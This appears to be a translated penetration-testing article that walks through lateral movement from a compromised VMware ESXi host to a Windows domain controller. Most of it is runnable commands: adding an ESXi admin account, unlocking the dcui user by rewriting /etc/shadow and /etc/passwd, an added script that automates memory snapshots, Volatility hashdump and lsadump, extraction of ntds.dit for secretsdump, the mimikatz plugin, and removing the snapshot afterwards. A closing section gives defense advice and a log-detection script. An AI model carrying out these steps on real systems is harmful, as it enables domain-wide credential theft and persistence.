0x00 Preface
---
Assume the following test environment: we have obtained control of an internal VMware ESXi host and discovered that a Windows domain controller runs as a virtual machine on it.
This article introduces, from a technical research perspective, a method of moving laterally from VMware ESXi into that Windows domain controller: it combines the exploitation idea with a worked procedure and provides defense and detection methods.
0x02 Introduction
---
This article will cover the following topics:
- Exploitation Ideas
- Common Commands
- Implementation Methods
0x03 Exploitation Ideas
---
Use the ESXi command line to take a snapshot of the domain controller virtual machine that includes its memory, then extract credentials (local and domain hashes, LSA secrets, logon material cached in lsass) from the snapshot's memory file. No credential for the guest and no connection to the guest's network services is needed: whoever controls the hypervisor can read the memory of every virtual machine on it.
0x04 Common Commands
---
1. Check ESXi Version
vmware -vl
2. User Information Related
(1) View all users
esxcli system account list
(2) View the roles (permissions) assigned to users, which shows who holds the Admin role
esxcli system permission list
(3) Add a user
esxcli system account add -i test1 -p Password@1 -c Password@1
(4) Grant a regular user the Admin role
esxcli system permission set -i test1 -r Admin
(5) Enable the built-in administrator account
By default, dcui is an administrator user but is not allowed to log in remotely: its shell in /etc/passwd is /sbin/nologin and its password field in /etc/shadow is locked (*). You can set a password for the dcui user and enable remote login by modifying these two files.
Set the dcui user password to Ballot5Twist7upset interactively: run passwd dcui and enter the password twice when prompted.
One-click set of the dcui user password (rewrites the dcui line of /etc/shadow with a SHA-512 crypt hash of that password): sed -i 's/dcui:\*:13358:0:99999:7:::/dcui:$6$NaeURj2m.ZplDfbq$LdmyMwxQ7FKh3DS5V\/zhRQvRvfWzQMSS3wftFwaUsD9IZuxdns.0X.SPx.59bT.kmJOJ\/y3zenTmEcoxDVQsS\/:19160:0:99999:7:::/g' /etc/shadow
Note that the search pattern is tied to the exact shadow entry of the test host (locked password field and last-change day 13358). On another host check the current line with grep '^dcui:' /etc/shadow first, otherwise the sed command silently matches nothing.
Enable dcui user remote login:
Modify the file /etc/passwd, changing dcui:x:100:100:DCUI User:/:/sbin/nologin to dcui:x:100:100:DCUI User:/:/bin/sh
One-click enable of dcui user remote login: sed -i 's/dcui:x:100:100:DCUI User:\/:\/sbin\/nologin/dcui:x:100:100:DCUI User:\/:\/bin\/sh/g' /etc/passwd
Enable and start SSH:
vim-cmd hostsvc/enable_ssh
vim-cmd hostsvc/start_ssh
3. Virtual Machine Related
(1) View all virtual machines (the first column is the vmid used by the commands below)
vim-cmd vmsvc/getallvms
(2) View the power state of a specified virtual machine
vim-cmd vmsvc/power.getstate <vmid>
(3) Power on a specified virtual machine; this also resumes it from the suspended state
vim-cmd vmsvc/power.on <vmid>
(4) Suspend the specified virtual machine
vim-cmd vmsvc/power.suspend <vmid>
(5) Power off the specified virtual machine (a hard power-off, not a guest shutdown)
vim-cmd vmsvc/power.off <vmid>
(6) View the recent tasks of the specified virtual machine
vim-cmd vmsvc/get.tasklist <vmid>
4. Virtual Machine Snapshot Related
(1) View snapshot information of the specified virtual machine, including each snapshot's Snapshot Id
vim-cmd vmsvc/get.snapshotinfo <vmid>
(2) Create a new snapshot
vim-cmd vmsvc/snapshot.create <vmid> <snapshotName> <snapshotDescription> <includeMemory> <quiesced>
Example 1:
vim-cmd vmsvc/snapshot.create 1 test testsnapshot true true
The fourth argument (includeMemory) set to true writes the guest's memory to a .vmem file in the virtual machine's directory on the datastore; without it no .vmem file is generated and there is nothing to analyze. The virtual machine is briefly stunned while memory is written, and the .vmem file is as large as the VM's configured RAM, so the datastore needs that much free space.
Example 2:
vim-cmd vmsvc/snapshot.create 1 test
This command is equivalent to vim-cmd vmsvc/snapshot.create 1 test "" false false: it does not include memory and will not generate a .vmem file.
(3) Delete a snapshot (the second argument is the Snapshot Id reported by get.snapshotinfo)
vim-cmd vmsvc/snapshot.remove <vmid> <snapshotId>
0x05 Implementation Method
---
1. Obtain the VM's vmid
vim-cmd vmsvc/getallvms
In the test environment, the output shows that the vmid of the Windows domain controller virtual machine (DC1) is 1.
2. View the virtual machine's snapshot information
vim-cmd vmsvc/get.snapshotinfo 1
There are no snapshots in the test environment.
3. Create a snapshot of the virtual machine that includes memory
vim-cmd vmsvc/snapshot.create 1 test testsnapshot true true
In the test environment, the output shows the snapshotIndex of the domain controller's new snapshot as 1, which is why the memory file located below is named DC1-Snapshot1.vmem.
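The three steps above are done by reading the vmid, the Snapshot Id and the .vmem path off the screen. The following shell script is an added example, not part of the original article, that parses the vim-cmd output instead, so the procedure can be scripted and the Snapshot Id (needed later for snapshot.remove) is not confused with the snapshotIndex in the file name. The VM name DC1, the snapshot name test, the Snapshot Id 5 and the sample outputs embedded in the script are constructed to resemble this test environment; the getallvms column layout and the "--Snapshot Name" / "--Snapshot Id" lines are as vim-cmd prints them on ESXi 6.x/7.x, reproduced from memory.

```shell
#!/bin/sh
# Added example (not from the original article): parse the vim-cmd output used in
# steps 1-3 instead of reading vmid and Snapshot Id off the screen, then take a
# memory-inclusive snapshot and locate the resulting .vmem file.

# stdin: output of `vim-cmd vmsvc/getallvms`; $1: VM name  ->  vmid on stdout
# (empty if no such VM). Assumes a VM name without spaces, since vim-cmd prints
# one space-separated row per VM after the header line.
vmid_for_name() {
    awk -v name="$1" 'NR > 1 && $2 == name { print $1; exit }'
}

# stdin: output of `vim-cmd vmsvc/getallvms`; $1: VM name  ->  the VM's directory
# on the datastore, e.g. "[datastore1] DC1/DC1.vmx" -> /vmfs/volumes/datastore1/DC1
vm_dir_for_name() {
    awk -v name="$1" 'NR > 1 && $2 == name {
        ds = $3; sub(/^\[/, "", ds); sub(/\]$/, "", ds)   # "[datastore1]" -> datastore1
        p = $4; sub(/\/[^\/]*$/, "", p)                     # "DC1/DC1.vmx"  -> DC1
        print "/vmfs/volumes/" ds "/" p; exit
    }'
}

# stdin: output of `vim-cmd vmsvc/get.snapshotinfo <vmid>`; $1: snapshot name
# -> the Snapshot Id, which is what snapshot.remove expects (it is not the
# snapshotIndex that appears in the .vmem file name).
snapshot_id_for_name() {
    awk -F ': *' -v name="$1" '
        /Snapshot Name/ { cur = $2 }
        /Snapshot Id/   { if (cur == name) { print $2; exit } }'
}

# Full procedure on a real host: $1 = VM name, $2 = snapshot name.
# Prints "vmid snapshotId vmemPath". Only the fourth snapshot.create argument
# (includeMemory) matters for memory capture; quiesce is left false because it
# needs VMware Tools in the guest and adds nothing to the .vmem file.
snapshot_with_memory() {
    vmid=$(vim-cmd vmsvc/getallvms | vmid_for_name "$1")
    [ -n "$vmid" ] || { echo "no VM named $1" >&2; return 1; }
    vmdir=$(vim-cmd vmsvc/getallvms | vm_dir_for_name "$1")
    vim-cmd vmsvc/snapshot.create "$vmid" "$2" "memory snapshot" true false >/dev/null || return 1
    sid=$(vim-cmd vmsvc/get.snapshotinfo "$vmid" | snapshot_id_for_name "$2")
    vmem=$(ls -t "$vmdir"/*.vmem 2>/dev/null | head -n 1)   # newest .vmem in the VM directory
    echo "$vmid $sid $vmem"
}

# Constructed sample outputs (not captured from a real host), used to exercise
# the parsers offline.
SAMPLE_GETALLVMS='Vmid   Name   File                        Guest OS                 Version   Annotation
1      DC1    [datastore1] DC1/DC1.vmx    windows9Server64Guest    vmx-14
2      WEB1   [datastore1] WEB1/WEB1.vmx  ubuntu64Guest            vmx-14'

SAMPLE_SNAPINFO='Get Snapshot:
|-ROOT
--Snapshot Name        : test
--Snapshot Id        : 5
--Snapshot Description : testsnapshot
--Snapshot Created On  : 9/6/2022 8:48:46
--Snapshot State       : powered on'

# Run the real procedure only when vim-cmd exists, i.e. on the ESXi host:
#   sh snapshot.sh DC1 test
if [ "$#" -ge 1 ] && command -v vim-cmd >/dev/null 2>&1; then
    snapshot_with_memory "$1" "${2:-test}"
fi
```

Off the host the script only defines the functions; the embedded sample outputs exercise them. The datastore path it prints uses the datastore label (/vmfs/volumes/datastore1), which on ESXi is a symlink to the UUID-named directory seen in the find output later in this article.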
4. Use volatility to analyze the snapshot file
volatility is an open-source memory forensics framework.
Python2 version: https://github.com/volatilityfoundation/volatility
Python3 version: https://github.com/volatilityfoundation/volatility3
volatility and volatility3 have different command syntax but essentially the same functionality. volatility3 is the current version, but volatility (2.6) is chosen here for the following reasons:
- volatility 2.6 ships as a standalone Linux executable that can be copied straight to the ESXi host, while volatility3 has to run from a Python 3 environment with its dependencies installed
- volatility has a community mimikatz plugin that extracts plaintext credentials from the lsass process, which volatility3 does not support
(1) Locate the memory file
Search for files with the suffix .vmem (the glob is quoted so the shell does not expand it; run from / so the path matches the output below):
find -name "*.vmem"
In the test environment, the memory file is located at ./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem
(2) Upload volatility_2.6_lin64_standalone
Download address for volatility_2.6_lin64_standalone:
http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
Every volatility command takes the .vmem file as input, and a .vmem file is as large as the VM's RAM, typically several GB. To avoid copying it over the network, volatility is uploaded to the ESXi host here and the snapshot file is analyzed in place. The trade-off is that the uploaded binary, its output under /tmp/ and the CPU load it causes are all visible on the host.
(3) View image information
Determine the guest OS version (the volatility profile) from the memory image with the following command:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" imageinfo
In the test environment, the suggested Profile is Win2016x64_14393. imageinfo lists every candidate profile it finds; if several are suggested, confirm the right one with kdbgscan before running the plugins below.
(4) Obtain local user hashes from the registry (SAM hive)
The command is as follows:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" hashdump
In the test environment, the output is:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58A478135A93AC3BF058A5EA0E8FDB71:::
Note that on a domain controller the local SAM holds only the Directory Services Restore Mode (DSRM) administrator account, not the domain accounts; the domain Administrator and every other domain user live in ntds.dit (see step (6)). The DSRM password is set when the DC is promoted and is rarely rotated, so this hash is still worth recording.
(5) Read LSA secrets from the registry (SECURITY hive)
The command is as follows:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" lsadump
In the test environment, the output lists secrets such as NL$KM (the key that protects cached domain logons):
NL$KM
(6) Export all domain user hashes
This requires the ntds.dit database together with the SYSTEM hive (for the boot key) and the SECURITY hive.
Locate the ntds.dit file in the memory image with the following command:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" filescan | grep ntds.dit
Output:
0x000000007eff8c20 16 0 R--rw- \Device\HarddiskVolume2\Windows\System32\ntds.dit
Extract the ntds.dit file with the following command. The first column of the filescan output is the physical offset passed to -Q, and -n keeps the original file name in the name of the dumped file:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" dumpfiles -Q 0x000000007eff8c20 -n -D /tmp/
Then extract the SYSTEM and SECURITY hives the same way (grep the filescan output for \Windows\System32\config\SYSTEM and \Windows\System32\config\SECURITY to get their offsets). To export all domain user hashes, run impacket's secretsdump on the three files:
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL
Be aware that dumpfiles reconstructs a file from the pages that happen to be cached in memory, so an ntds.dit recovered this way can have holes (zero-filled pages); secretsdump may then fail or return only part of the users. The hashes it does return are valid.
(7) Load the mimikatz plugin to read credentials saved in the lsass process
volatility_2.6_lin64_standalone does not support loading the mimikatz plugin. Instead, download the whole snapshot file (DC1-Snapshot1.vmem) locally, set up a volatility environment and load the mimikatz plugin there.
Method to install volatility on Kali:
- Installation
apt-get install pcregrep libpcre++-dev python2-dev python-pip -y
git clone https://github.com/volatilityfoundation/volatility.git
cd volatility
pip2 install pycrypto
(pycrypto is used by hashdump, lsadump and the mimikatz plugin)
- Test volatility
python2 vol.py -h
- Add the mimikatz plugin
Download URL: https://github.com/volatilityfoundation/community/blob/master/FrancescoPicasso/mimikatz.py
Save mimikatz.py to volatility/plugins/ inside the cloned repository
- Install the dependency of the mimikatz plugin
pip2 install construct==2.5.5-reupload
Do not run pip2 install construct without the version pin: newer construct releases removed the API the plugin uses, and loading mimikatz.py then fails with AttributeError: 'module' object has no attribute 'ULInt32'
- Test the plugin
python2 vol.py --info | grep mimikatz
Output:
Volatility Foundation Volatility Framework 2.6.1
If the plugin is listed, the installation is successful.
The command to run the mimikatz plugin is as follows:
python2 vol.py -f "DC1-Snapshot1.vmem" --profile="Win2016x64_14393" mimikatz
Output:
Module User Domain Password
Additional note:
To read credentials saved in the lsass process, the following method can also be used:
- Convert the memory image to a Windows crash dump file
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" raw2dmp -O copy.dmp
- Use Mimilib to export passwords from the dump file
For the detailed method, see the previous article "Penetration Techniques - Using Mimilib to Export Passwords from Dump Files"
5. Delete the snapshot
vim-cmd vmsvc/snapshot.remove 1 5
The second argument is the Snapshot Id shown by vim-cmd vmsvc/get.snapshotinfo 1 (5 in the test environment); it is not the snapshotIndex that appears in the .vmem file name, so check get.snapshotinfo before removing. Removing the snapshot deletes the .vmem file, but the uploaded volatility binary and any files dumped to /tmp/ remain on the host until they are removed as well.
0x06 Defense and Detection
---
1. Defense
Patch internal VMware ESXi hosts promptly.
Keep SSH and the ESXi Shell disabled on internal ESXi hosts, and enable lockdown mode so that hosts are managed only through vCenter.
Treat ESXi administrators and the management network as Tier 0: whoever controls the hypervisor can read the memory and disks of every virtual machine on it, domain controllers included, without any credential for the guest.
2. Detection
Review ESXi login logs (/var/log/auth.log for SSH logins) and the shell command history in /var/log/shell.log, which records every command typed in the ESXi Shell: vim-cmd vmsvc/snapshot.create with the includeMemory argument set to true, searches for *.vmem files and the execution of uploaded analysis tools are all visible there.
Snapshot creation is also recorded as a createSnapshot task in /var/log/hostd.log and in the vmware.log file in the virtual machine's directory, so snapshots taken of domain controllers outside maintenance windows can be alerted on even when they are created through the API rather than the shell.
Check whether the snapshotIndex of a virtual machine's snapshot files is abnormal. For a new virtual machine the snapshotIndex of newly created snapshots increments starting from 1, and deleting a snapshot does not reset it: after the snapshot with snapshotIndex 1 is deleted, the next created snapshot gets snapshotIndex 2. A domain controller that has no snapshots but whose next snapshot gets an index greater than 1 has had snapshots created and removed.
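As an added example (not from the original article), the following POSIX shell functions implement the detection points above over constructed ESXi log lines. The line formats follow what ESXi writes to /var/log/shell.log (shell[pid]: [user]: command) and /var/log/hostd.log (Task Created : haTask-<vmid>-vim.VirtualMachine.createSnapshot-<n>); the timestamps, pids and opIDs in the samples are invented, and the hostd line layout is approximated from memory, which is why the functions key on the haTask token rather than on the rest of the line.

```shell
#!/bin/sh
# Added example (not from the original article): detection logic for the
# snapshot-and-analyze technique, run over constructed ESXi log lines.

# stdin: shell.log lines -> snapshot.create invocations whose fourth argument
# (includeMemory) is true, i.e. the only snapshots that produce a .vmem file.
memory_snapshot_commands() {
    awk '
        /vmsvc\/snapshot\.create/ {
            # after the sub-command: <vmid> <name> <description> <includeMemory> <quiesced>
            # (a quoted description containing spaces would shift the fields)
            for (i = 1; i <= NF; i++)
                if ($i == "vmsvc/snapshot.create" && $(i + 4) == "true") { print; next }
        }'
}

# stdin: shell.log lines -> commands that touch memory files or run an analysis
# tool on the host (searches for .vmem files, the volatility binary).
vmem_access_commands() {
    grep -E '\.vmem|volatility' || true
}

# stdin: shell.log lines -> snapshot removals, the cleanup step of the technique.
snapshot_removal_commands() {
    grep 'vmsvc/snapshot\.remove' || true
}

# stdin: hostd.log lines -> vmid of every created createSnapshot task, which
# also covers snapshots taken through the API rather than the shell.
snapshot_task_vmids() {
    awk '
        /Task Created : haTask-[0-9]+-vim\.VirtualMachine\.createSnapshot/ {
            match($0, /haTask-[0-9]+-/)
            print substr($0, RSTART + 7, RLENGTH - 8)   # strip "haTask-" and the trailing "-"
        }'
}

count_lines() { awk 'END { print NR }'; }

# Constructed sample logs (not captured from a real host).
SAMPLE_SHELL_LOG='2022-09-06T08:40:12Z shell[2100400]: [root]: vim-cmd vmsvc/getallvms
2022-09-06T08:40:31Z shell[2100400]: [root]: vim-cmd vmsvc/get.snapshotinfo 1
2022-09-06T08:41:03Z shell[2100400]: [root]: vim-cmd vmsvc/snapshot.create 1 test testsnapshot true true
2022-09-06T08:42:10Z shell[2100400]: [root]: find -name "*.vmem"
2022-09-06T08:45:55Z shell[2100400]: [root]: ./volatility_2.6_lin64_standalone -f ./vmfs/volumes/datastore1/DC1/DC1-Snapshot1.vmem imageinfo
2022-09-06T09:10:00Z shell[2100400]: [root]: vim-cmd vmsvc/snapshot.create 2 backup pre-patch false false
2022-09-06T09:12:00Z shell[2100400]: [root]: vim-cmd vmsvc/snapshot.remove 1 5'

SAMPLE_HOSTD_LOG='2022-09-06T08:41:03.512Z info hostd[2099218] [Originator@6876 sub=Vimsvc.TaskManager opID=e1a2b3c4] Task Created : haTask-1-vim.VirtualMachine.createSnapshot-1152
2022-09-06T08:41:09.004Z info hostd[2099218] [Originator@6876 sub=Vimsvc.TaskManager opID=e1a2b3c4] Task Completed : haTask-1-vim.VirtualMachine.createSnapshot-1152 Status success
2022-09-06T09:10:00.120Z info hostd[2099218] [Originator@6876 sub=Vimsvc.TaskManager opID=f5e6d7c8] Task Created : haTask-2-vim.VirtualMachine.createSnapshot-1160'

# On an ESXi host, run the checks against the live logs.
if [ -r /var/log/shell.log ]; then
    echo "== snapshots taken with memory =="; memory_snapshot_commands < /var/log/shell.log
    echo "== .vmem access / analysis tools =="; vmem_access_commands < /var/log/shell.log
    echo "== snapshot removals =="; snapshot_removal_commands < /var/log/shell.log
fi
if [ -r /var/log/hostd.log ]; then
    echo "== vmids with createSnapshot tasks =="; snapshot_task_vmids < /var/log/hostd.log | sort -u
fi
```

The only non-maintenance snapshot in the sample is the one on vmid 1 taken with includeMemory=true; the second snapshot.create (memory false) is not flagged, and the "Task Completed" hostd line is ignored so each task is counted once. Correlating the flagged vmids with the list of domain controller VMs from vim-cmd vmsvc/getallvms turns this into a usable alert.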
0x07 Summary
---
This article introduces, from a technical research perspective, a method of lateral movement from VMware ESXi to a Windows domain controller virtual machine: take a memory-inclusive snapshot, analyze the memory file with Volatility to extract local and domain credentials, and pair the exploitation idea with defense and detection methods.